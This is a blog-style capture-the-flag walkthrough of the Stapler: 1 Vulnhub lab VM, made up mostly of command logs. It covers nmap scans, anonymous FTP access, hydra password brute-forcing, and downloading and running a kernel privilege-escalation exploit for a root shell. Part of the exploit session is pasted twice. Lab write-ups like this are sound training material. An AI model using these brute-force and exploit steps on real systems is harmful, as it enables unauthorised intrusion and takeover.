Stapler: 1 Vulnhub Walkthrough

  • vulnhub
  • hacking

posted on 19 Jun 2016 under category writeup

Figure out the IP

paul@archyoga [05:31:55] [~]
-> % nmap -sn 192.168.1.0/24

Starting Nmap 7.12 ( https://nmap.org ) at 2016-06-19 17:32 EDT
.
.
.
Nmap scan report for red (192.168.1.135)
Host is up (0.0030s latency).
.
.
.
Nmap done: 256 IP addresses (16 hosts up) scanned in 3.59 seconds

Let’s see what’s there:

paul@archyoga [05:33:59] [~]
-> % nmap -Pn 192.168.1.135

Starting Nmap 7.12 ( https://nmap.org ) at 2016-06-19 17:34 EDT
Nmap scan report for red (192.168.1.135)
Host is up (0.011s latency).
Not shown: 992 filtered ports
PORT     STATE  SERVICE
20/tcp   closed ftp-data
21/tcp   open   ftp
22/tcp   open   ssh
53/tcp   open   domain
80/tcp   open   http
139/tcp  open   netbios-ssn
666/tcp  open   doom
3306/tcp open   mysql

Nmap done: 1 IP address (1 host up) scanned in 4.86 seconds

Login to ftp

paul@archyoga [05:34:57] [~]
-> % ftp
ftp> open 192.168.1.135
Connected to 192.168.1.135.
220-
220-|-----------------------------------------------------------------------------------------|
220-| Harry, make sure to update the banner when you get a chance to show who has access here |
220-|-----------------------------------------------------------------------------------------|
220-
220
Name (192.168.1.135:paul): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0             107 Jun 03 23:06 note
226 Directory send OK.
ftp> get note
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note (107 bytes).
226 Transfer complete.
107 bytes received in 5.1e-05 seconds (2 Mbytes/s)
ftp> 221 Goodbye.

paul@archyoga [05:36:17] [~]
-> % cat note
Elly, make sure you update the payload information. Leave it in your FTP account once your are done, John.

Turns out it is, and inside is a file named note which names an ftp user: elly. I used hydra to test some common passwords and that worked out:

paul@archyoga [05:39:21] [~]
-> % hydra -l elly -e nsr 92.168.1.135 ftp
Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2016-06-19 17:39:36
[WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
[DATA] max 3 tasks per 1 server, overall 64 tasks, 3 login tries (l:1/p:3), ~0 tries per task
[DATA] attacking service ftp on port 21
[21][ftp] host: 192.168.1.135   login: elly   password: ylle
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-06-19 17:39:50

Now we can login to ftp as elly using the password ylle. On the ftp server there’s a passwd file, so I can use that as a user list to test against:

paul@archyoga [05:42:07] [~]
-> % ftp                                     
ftp> open 192.168.1.135
Connected to 192.168.1.135.
220-
220-|-----------------------------------------------------------------------------------------|
220-| Harry, make sure to update the banner when you get a chance to show who has access here |
220-|-----------------------------------------------------------------------------------------|
220-
220
Name (192.168.1.135:paul): elly
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
.
.
.
-rw-r--r--    1 0        0            2908 Jun 04 20:14 passwd
.
.
.
ftp> get passwd
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for passwd (2908 bytes).
226 Transfer complete.
2908 bytes received in 9.9e-05 seconds (28 Mbytes/s)
ftp> 221 Goodbye.

Login over ssh & exploit

Using hydra again I discovered a login for ssh from the passwd file:

paul@archyoga [05:42:36] [~]
-> % awk -F':' '{ print $1}' passwd > users


-> % hydra -e nsr -L ./users 192.168.1.135 ssh  
Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2016-06-19 17:44:42
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 64 tasks, 183 login tries (l:61/p:3), ~0 tries per task
[DATA] attacking service ssh on port 22
[22][ssh] host: 192.168.1.135   login: SHayslett   password: SHayslett

Then once I determined the release I went over to http://exploit-db.com and searched “ubuntu 16.04” and found this: https://www.exploit-db.com/exploits/39772/

Now for the exploit:

paul@archyoga [05:50:44] [~]
-> % ssh SHayslett@192.168.1.135
-----------------------------------------------------------------
~          Barry, don't forget to put a message here           ~
-----------------------------------------------------------------
SHayslett@192.168.1.135's password:
Welcome back!


SHayslett@red:~$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description:    Ubuntu 16.04 LTS
Release:        16.04
Codename:       xenial
SHayslett@red:~$ wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39772.zip
--2016-06-19 18:49:36--  https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39772.zip
Resolving github.com (github.com)... 192.30.252.130
Connecting to github.com (github.com)|192.30.252.130|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/master/sploits/39772.zip [following]
--2016-06-19 18:49:36--  https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/master/sploits/39772.zip
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 23.235.44.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|23.235.44.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7115 (6.9K) [application/zip]
Saving to: ‘39772.zip’

39772.zip                                                                     100%[=====================================================================================================================================================================================================>]   6.95K  --.-KB/s    in 0s      

2016-06-19 18:49:37 (94.2 MB/s) - ‘39772.zip’ saved [7115/7115]

SHayslett@red:~/tmp$ wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/splo
--2016-06-19 18:52:05--  https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploi
Resolving github.com (github.com)... 192.30.252.128
Connecting to github.com (github.com)|192.30.252.128|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/master/sploits/3
--2016-06-19 18:52:05--  https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/m
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 23.235.46.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|23.235.46.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7115 (6.9K) [application/zip]
Saving to: ‘39772.zip’

39772.zip                                                                       100%[=======================

2016-06-19 18:52:05 (4.75 MB/s) - ‘39772.zip’ saved [7115/7115]

SHayslett@red:~/tmp$ unzip *
Archive:  39772.zip
   creating: 39772/
.
.
.
SHayslett@red:~/tmp$ cd *2
SHayslett@red:~/tmp/39772$ ls
crasher.tar  exploit.tar
SHayslett@red:~/tmp/39772$ tar xf exploit.tar
SHayslett@red:~/tmp/39772$ ls
crasher.tar  ebpf_mapfd_doubleput_exploit  exploit.tar
SHayslett@red:~/tmp/39772$ cd e*
SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls
compile.sh  doubleput.c  hello.c  suidhelper.c
SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./compile.sh
doubleput.c: In function ‘make_setuid’:
doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
    .insns = (__aligned_u64) insns,
             ^
doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
    .license = (__aligned_u64)""
               ^
SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls
compile.sh  doubleput  doubleput.c  hello  hello.c  suidhelper  suidhelper.c
SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...
root@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit# cd /root
SHayslett@red:~/tmp/39772$ cd e*
SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls
compile.sh  doubleput.c  hello.c  suidhelper.c
SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./compile.sh
doubleput.c: In function ‘make_setuid’:
doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
    .insns = (__aligned_u64) insns,
             ^
doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
    .license = (__aligned_u64)""
               ^
SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls
compile.sh  doubleput  doubleput.c  hello  hello.c  suidhelper  suidhelper.c
SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...
root@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit#

This part might be a little hard to read, but all I did was follow the instructions from the exploit page pretty much word for word: https://www.exploit-db.com/exploits/39772/.

Next, the flag!

root@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit# cd /root
root@red:/root# ls
fix-wordpress.sh  flag.txt  issue  python.sh  wordpress.sql
root@red:/root# cat flag.txt
~~~~~~~~~~<(Congratulations)>~~~~~~~~~~
                          .-'''''-.
                          |'-----'|
                          |-.....-|
                          |       |
                          |       |
         _,._             |       |
    __.o`   o`"-.         |       |
 .-O o `"-.o   O )_,._    |       |
( o   O  o )--.-"`O   o"-.`'-----'`
 '--------'  (   o  O    o)  
              `----------`
b6b545dc11b7a270f4bad23432190c75162c4a2b

Woo!